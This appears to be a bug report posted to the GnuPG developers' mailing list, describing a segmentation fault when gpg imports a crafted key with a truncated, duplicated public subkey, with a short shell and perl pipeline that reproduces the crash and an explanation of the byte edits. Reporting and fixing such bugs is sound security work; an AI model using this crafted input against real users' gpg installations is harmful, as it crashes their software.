crash importing truncated subkeys
Tavis Ormandy
taviso at gmail.com
Fri Apr 22 00:19:21 CEST 2022
Hello, I noticed that if there are two opaque identical public subkey
packets, but one is truncated, gpg crashes on import in gcry_mpi_cmp()
I just did this to repro:
$ gpgcompose --public-key taviso --public-subkey taviso \
--user-id anything --public-subkey taviso \
| perl -p -e 's/(\xb9..\x04....)\x01/\1\xff/g' \
| head -c -1 | gpg --import
gpg: premature eof while reading rest of packet
gpg: signal Segmentation fault caught ... exiting
Segmentation fault
That ugly horrible regex is:
\xb9 : Find old-style public-subkey with 2 byte length
.. : skip over the length bytes
\x04 : looking for version 4
.... : skip over the timestamp
\x01 : change the algorithm so it's not recognized by gcry_mpi_cmp.
Then piping it into head to truncate the last packet.
I think it should work on any RSA public key, e.g. just replace
the --public-subkey taviso with the id, 4B092E28 works.
Tavis.
--
_o) $ lynx lock.cmpxchg8b.com
/\\ _o) _o) $ finger taviso at sdf.org
_\_V _( ) _( ) @taviso
More information about the Gnupg-devel
mailing list